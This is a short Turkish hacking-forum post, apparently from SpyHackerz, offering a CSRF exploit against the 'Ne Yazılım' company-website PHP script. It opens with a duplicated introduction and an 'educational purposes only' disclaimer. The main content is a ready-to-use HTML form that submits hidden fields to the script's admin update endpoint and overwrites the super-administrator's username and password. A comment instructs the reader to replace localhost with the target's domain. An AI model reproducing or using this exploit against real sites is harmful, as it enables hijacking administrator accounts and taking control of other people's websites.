Selamlar
Ne Yazılım firma script içindeki csrf web güvenlik açığı ile admin hesabı oluşturabilmekteyiz.
İlgili script: https://www.emrahyuksel.com.tr/ne-yazilim-firma-scripti-v1/
Exploit:
Not: sadece eğitim amaçlıdır. Yasadışı işlemler sonucu hiçbir sorumluluk kabul etmemekteyim.
Ne Yazılım firma script içindeki csrf web güvenlik açığı ile admin hesabı oluşturabilmekteyiz.
İlgili script: https://www.emrahyuksel.com.tr/ne-yazilim-firma-scripti-v1/
Exploit:
HTML:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>NeYazılım Firma Scripti CSRF to Admin Takeover</title>
</head>
<body>
<p>NeYazılım Firma Scripti CSRF to Admin Takeover</p>
<p>Oluşturulacak süper yetkili için bilgileri giriniz...</p>
<form action="http://localhost/nedmin/netting/islem.php" method="POST"> <!-- sadece localhost olan kısmı domain ile değiştiriniz. -->
<input type="hidden" name="admin_id" value="1">
<input type="text" name="admin_kadi" placeholder="Kullanıcı Adı"><br><br>
<input type="text" name="admin_sifre" placeholder="Parola"><br><br>
<input type="hidden" name="adminguncelle">
<input type="submit">
</form>
</body>
</html>Not: sadece eğitim amaçlıdır. Yasadışı işlemler sonucu hiçbir sorumluluk kabul etmemekteyim.
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
